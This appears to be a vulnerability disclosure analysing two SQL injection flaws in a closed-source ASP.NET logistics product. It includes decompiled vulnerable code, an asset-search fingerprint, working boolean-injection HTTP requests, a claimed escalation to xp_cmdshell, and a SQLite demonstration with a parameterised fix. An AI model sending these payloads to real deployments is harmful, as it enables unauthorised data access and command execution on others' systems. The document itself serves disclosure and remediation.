Analysis of multiple SQL injection flaws in the 某胜物流 logistics software
Vulnerability analysis
1. Overview
===========

The 某胜物流 logistics application (an ASP.NET MVC product) contains several SQL injection flaws. Two are analysed below: in both, an MVC controller action forwards caller-controlled strings straight to a data-access (DAL) method that concatenates them into the SQL text.

2. Affected versions
====================

The product displays no version number on its pages, so the affected range could not be pinned down from the deployment analysed.

3. Root-cause analysis
======================

exp1: MVC controller `MsBaseInfoController`
-------------------------------------------

```csharp
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web.Mvc;
using HcUtility.Comm;
using HcUtility.Core;

namespace DSWeb.MvcShipping.Controllers
{
    // Token: 0x02000935 RID: 2357
    [JsonRequestBehavior]
    public class MsBaseInfoController : Controller
    {
        // Both form/query values reach the DAL without any validation.
        public ContentResult GetBANKList(string condition, string companyid)
        {
            string text = companyid;
            if (text == "" || text == null)
            {
                // Only an empty value falls back to the session; a caller-supplied
                // companyid is used as-is.
                text = Convert.ToString(base.Session["COMPANYID"]);
            }
            List<BANK> banklist = MsBaseInfoDAL.GetBANKList(condition, text);
            string content = JsonConvert.Serialize(new
            {
                Success = true,
                Message = "查询成功", // "query succeeded"
                totalCount = banklist.Count, // full row count, independent of paging
                data = banklist.ToList<BANK>()
            });
            return new ContentResult { Content = content };
        }
    }
}
```

### Trigger path

`MsBaseInfoController.GetBANKList` passes `condition` and `companyid` unchanged to `MsBaseInfoDAL.GetBANKList`. That method builds the query with string concatenation: `COMPANYID` is spliced into a quoted literal, and `strCondition` is appended verbatim after `AND`, so both parameters are injection points on the same route.

```csharp
// MsBaseInfoDAL
using System.Collections.Generic;
using System.Text;

// Token: 0x0600D0D5 RID: 53461 RVA: 0x005CD67C File Offset: 0x005CB87C
public static List<BANK> GetBANKList(string strCondition, string COMPANYID)
{
    StringBuilder stringBuilder = new StringBuilder();
    stringBuilder.Append(" SELECT ");
    stringBuilder.Append(" '' GID,'' CODENAME,'' CURRENCY,'' BANKNAME,'' ACCOUNT,'' ACCOUNTNAME,'' ISSTOP,'' ISDEF");
    stringBuilder.Append(" union all ");
    stringBuilder.Append(" SELECT ");
    stringBuilder.Append(" GID,CODENAME,CURRENCY,BANKNAME,ACCOUNT,ACCOUNTNAME,ISSTOP,ISDEF");
    // Injection point 1: COMPANYID is concatenated into a quoted literal.
    stringBuilder.Append(" from sys_bank WHERE LINKID='" + COMPANYID + "'");
    if (!string.IsNullOrEmpty(strCondition))
    {
        // Injection point 2: strCondition is appended as a raw SQL fragment.
        stringBuilder.Append(" AND " + strCondition);
    }
    stringBuilder.Append(" order by CODENAME");
    return MsBaseInfoDAL.SetBANKData(stringBuilder);
}
```

exp2: MVC controller `MsWlDriverController`
-------------------------------------------

```csharp
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web.Mvc;
using HcUtility.Comm;
using HcUtility.Core;

namespace DSWeb.Areas.TruckMng.Controllers
{
    // Token: 0x02000AFD RID: 2813
    [JsonRequestBehavior]
    public class MsWlDriverController : Controller
    {
        // Token: 0x0600F414 RID: 62484 RVA: 0x0084D8C0 File Offset: 0x0084BAC0
        public ContentResult GetDataList_Salary(int start, int limit, string sort, string condition)
        {
            // condition and sort are handed to the DAL untouched.
            List<MsWlDriver_Salary> dataList = MsWlDriver_SalaryDAL.GetDataList(
                condition,
                Convert.ToString(base.Session["USERID"]),
                CookieConfig.GetCookie_UserCode(base.Request),
                CookieConfig.GetCookie_OrgCode(base.Request),
                sort);
            IEnumerable<MsWlDriver_Salary> source = dataList.Skip(start).Take(limit);
            string content = JsonConvert.Serialize(new
            {
                Success = true,
                Message = "查询成功", // "query succeeded"
                totalCount = dataList.Count, // full count before Skip/Take
                data = source.ToList<MsWlDriver_Salary>()
            });
            return new ContentResult { Content = content };
        }
    }
}
```

### Trigger path

`MsWlDriverController.GetDataList_Salary` forwards `condition` unchanged to `MsWlDriver_SalaryDAL.GetDataList`, where it is concatenated into the query in the same way as `strCondition` in exp1. Note that `totalCount` is computed on the full result set before `Skip`/`Take`, so a boolean injection is visible in the count even when `limit=1`.

4. Environment setup (closed-source system; asset-search query and screenshots)
===============================================================================

Fingerprint (closed-source system)
----------------------------------

```text
body="dhtmlxcombo_whp.js"
```

5. Reproduction
===============

exp1
----

### Route

```text
/MvcShipping/MsBaseInfo/GetBANKList
```

### SQL injection, escalated by the author to xp_cmdshell command execution

The request below is the boolean probe (`and 1=1`); pairing it with `and 1=2` and comparing `totalCount` confirms the injection. The form field is sent as `COMPANYID` while the action parameter is `companyid`; ASP.NET MVC model binding is case-insensitive, so the value reaches the DAL. `isvisible` and `issavevalue` are not action parameters and are ignored. Reaching `xp_cmdshell` additionally requires that the application's database login has the rights to enable and run the procedure.

```http
POST /MvcShipping/MsBaseInfo/GetBANKList HTTP/1.1
Host: xxx
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

condition=1&isvisible=true&issavevalue=true&COMPANYID=1'and 1=1 -- 
```

exp2
----

### Route

```text
/TruckMng/MsWlDriver/GetDataList_Salary
```

### SQL injection, escalated by the author to xp_cmdshell command execution

Only `start`, `limit`, `sort` and `condition` are bound by the action; `aa`, `isvisible`, `issavevalue`, `VKNO`, `strACCDATE` and `strUserID` are ignored. With `start=1&limit=1` at most one row is returned, but `totalCount` still reflects the injected condition.

```http
POST /TruckMng/MsWlDriver/GetDataList_Salary HTTP/1.1
Host: xxx
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

aa=1&isvisible=true&issavevalue=true&condition=1'and 1=1 -- &VKNO=true&strACCDATE=true&strUserID=1&start=1&limit=1&sort=a
```

6. Summary
==========
Fix for the multiple SQL injections in the 某胜物流 software: stop building SQL by string concatenation in the DAL. `COMPANYID` should be bound as a query parameter; `condition`, which is accepted as a raw SQL fragment, cannot be parameterised as designed and must be replaced by a whitelist of filterable columns with bound values.
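The following Python script is an added illustration, not code from the page or from the vendor. It rebuilds the `GetBANKList` statement exactly as `MsBaseInfoDAL` concatenates it (section 3), runs it against an in-memory SQLite stand-in for the product's SQL Server database (the `sys_bank` rows are constructed), and shows the boolean oracle behind the `and 1=1` requests of section 5 as well as injection through the `condition` fragment, which is the same pattern exp2 relies on. The hardened variant, the whitelist of filterable columns and the sample data are assumptions made for the example.

```python
import sqlite3

# Constructed sample rows for sys_bank (not from the page): company 1 has two
# bank records, company 2 has one. Column order mirrors the DAL's SELECT list.
SEED_ROWS = [
    ("g1", "BOC",  "CNY", "Bank of China", "111", "Acme Co",  "0", "1", "1"),
    ("g2", "ICBC", "CNY", "ICBC",          "222", "Acme Co",  "0", "0", "1"),
    ("g3", "HSBC", "USD", "HSBC",          "333", "Other Co", "0", "1", "2"),
]
COLUMNS = "GID,CODENAME,CURRENCY,BANKNAME,ACCOUNT,ACCOUNTNAME,ISSTOP,ISDEF"
BLANK_ROW = ("'' GID,'' CODENAME,'' CURRENCY,'' BANKNAME,"
             "'' ACCOUNT,'' ACCOUNTNAME,'' ISSTOP,'' ISDEF")


def open_db() -> sqlite3.Connection:
    """In-memory stand-in for the product's database (assumption: SQLite)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(f"CREATE TABLE sys_bank ({COLUMNS},LINKID)")
    conn.executemany("INSERT INTO sys_bank VALUES (?,?,?,?,?,?,?,?,?)", SEED_ROWS)
    return conn


def build_vulnerable_sql(condition: str, company_id: str) -> str:
    """Assemble the statement the way MsBaseInfoDAL.GetBANKList does:
    COMPANYID is spliced into a quoted literal and strCondition is appended
    as a raw fragment after AND. Both come from the HTTP request."""
    sql = (" SELECT " + BLANK_ROW +
           " union all SELECT " + COLUMNS +
           " from sys_bank WHERE LINKID='" + company_id + "'")
    if condition:
        sql += " AND " + condition
    sql += " order by CODENAME"
    return sql


def get_bank_list_vulnerable(condition: str, company_id: str) -> list:
    """Run the concatenated query; returns the blank header row plus matches."""
    conn = open_db()
    try:
        return conn.execute(build_vulnerable_sql(condition, company_id)).fetchall()
    finally:
        conn.close()


# Hardened variant (assumed design, not the vendor's fix): LINKID is bound as a
# parameter, and the free-form `condition` fragment is replaced by a whitelist
# of filterable columns whose values are bound too.
FILTERABLE = {"CODENAME", "CURRENCY", "BANKNAME", "ISSTOP", "ISDEF"}


def get_bank_list_fixed(filters: dict, company_id: str) -> list:
    clauses, params = ["LINKID=?"], [company_id]
    for column, value in filters.items():
        if column not in FILTERABLE:
            raise ValueError(f"column not filterable: {column!r}")
        clauses.append(f"{column}=?")   # identifier comes from the whitelist only
        params.append(value)            # value is bound, never concatenated
    sql = (" SELECT " + BLANK_ROW +
           " union all SELECT " + COLUMNS +
           " from sys_bank WHERE " + " AND ".join(clauses) +
           " order by CODENAME")
    conn = open_db()
    try:
        return conn.execute(sql, params).fetchall()
    finally:
        conn.close()


if __name__ == "__main__":
    # Boolean pair from the page's request: the row count (totalCount in the
    # JSON) differs, which is the oracle. The "--" also swallows the trailing
    # "' AND 1 order by CODENAME" the DAL appends.
    print(len(get_bank_list_vulnerable("1", "1' and 1=1 -- ")))   # 3
    print(len(get_bank_list_vulnerable("1", "1' and 1=2 -- ")))   # 1

    # Injection through the `condition` fragment alone, with a valid company id:
    # the other company's record leaks.
    print(len(get_bank_list_vulnerable("1=1 or LINKID='2' -- ", "1")))  # 4

    # Same payload against the hardened query matches nothing but the header row.
    print(len(get_bank_list_fixed({}, "1' and 1=1 -- ")))          # 1
    print(len(get_bank_list_fixed({"CURRENCY": "CNY"}, "1")))      # 3
```

SQLite and SQL Server treat `'...'` literals and `--` line comments the same way, so the rewritten query behaves like the original on both; the difference in detail is only that on SQL Server the author's reported next step is `xp_cmdshell`, which this stand-in cannot reproduce.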
Published 2025-07-21 15:06:51
Category: Web applications
Author: 123彡